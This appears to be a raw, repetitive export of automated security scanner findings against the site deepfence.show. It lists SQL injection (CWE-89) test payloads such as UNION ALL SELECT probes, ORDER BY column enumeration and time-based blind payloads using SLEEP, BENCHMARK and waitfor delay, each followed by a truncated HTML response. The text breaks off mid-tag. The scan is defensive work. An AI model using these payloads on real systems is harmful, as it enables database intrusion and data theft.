href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1576\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1577\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1578\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# );waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1579\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1580\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1581\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 21--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1582\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1583\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1584\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(\n500000000/2))))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1585\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \") or (\"x\")=(\"x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1586\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \"&\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1587\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1588\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1589\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+\nCHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+\nCHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+\nCHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)+CHAR(113),NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 